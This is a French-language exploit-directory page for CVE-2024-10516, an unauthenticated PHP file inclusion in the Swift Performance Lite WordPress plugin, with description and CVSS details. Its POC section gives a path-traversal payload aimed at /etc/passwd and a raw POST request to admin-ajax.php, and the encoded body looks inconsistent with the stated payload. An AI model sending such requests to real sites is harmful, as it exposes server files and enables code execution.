Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10516 — Swift Performance Lite <= 2.3.7.1 - Inclusion de fichier PHP locale non authentifiée via 'ajaxify' | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-10516
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-10516

CVE-2024-10516

Swift Performance Lite <= 2.3.7.1 - Inclusion de fichier PHP locale non authentifiée via 'ajaxify'

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-10516

Swift Performance Lite <= 2.3.7.1 - Inclusion locale de fichier PHP non authentifiée via 'ajaxify'

Description

Le plugin Swift Performance Lite pour WordPress est vulnérable à une inclusion locale de fichier PHP dans toutes les versions jusqu'à la 2.3.7.1 incluse via la fonction 'ajaxify'. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter des fichiers arbitraires sur le serveur, permettant l'exécution de tout code PHP dans ces fichiers. Cela peut être utilisé pour contourner les contrôles d'accès, obtenir des données sensibles ou réaliser une exécution de code dans les cas où des images et d'autres types de fichiers "sûrs" peuvent être téléchargés et inclus.

Détails

  • Type: plugin
  • Slug: swift-performance-lite
  • Version affectée: 2.3.7.1
  • Score CVSS: 8.1
  • Évaluation CVSS: Élevée
  • Vecteur CVSS: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-10516
  • Statut: Actif

POC

Base64 Payload = ["template-part","null","../../../../../etc/passwd"]

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202

action=swift_performance_ajaxify&data=WyJ0ZW1wbGFzc3dkIl0=
Télécharger l’outil